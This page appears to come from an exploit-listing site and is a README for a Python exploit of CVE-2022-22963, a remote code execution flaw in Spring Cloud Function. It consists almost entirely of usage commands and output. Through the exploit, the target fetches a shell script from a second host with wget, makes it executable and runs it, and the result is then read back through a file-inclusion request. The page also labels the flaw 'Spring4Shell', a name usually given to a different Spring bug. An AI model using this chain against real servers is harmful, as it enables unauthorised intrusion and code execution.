Share
## https://sploitus.com/exploit?id=D1A30248-63E3-5F72-9EDD-1779A6F23FA7
## CVE-2022-22963: Spring4Shell RCE Exploit

This is a python implemetation of Spring4Shell, CVE-2022-22963, affecting services running Spring Cloud Function <=3.1.6 (for 3.1.x) and <=3.2.2 (for 3.2.x).

### Example Usage:

```bash
# serving test.sh on local webserver
$ cat test.sh                                                               
#!/bin/bash
whoami > /tmp/rce

$ python exploit.py 10.10.10.10:8080 'wget http://10.10.10.60/test.sh -O /tmp/test.sh'
[+] Host is vulnerable
[+] Command executed
[+] Exploit completed

$ python exploit.py 10.10.10.10:8080 'chmod +x /tmp/test.sh'             
[+] Host is vulnerable
[+] Command executed
[+] Exploit completed

$ python exploit.py 10.10.10.10:8080 '/tmp/test.sh' 
[+] Host is vulnerable
[+] Command executed
[+] Exploit completed

# Provided you have LFI, you can see the contents of the file created
$ curl -s http://10.10.10.10:8080/LFI?file=/tmp/rce

user
```
### References:
https://www.fastly.com/blog/spring-has-sprung-breaking-down-cve-2022-22963-and-spring4shell-cve-2022

https://github.com/Pizz33/Spring-Cloud-Function-SpEL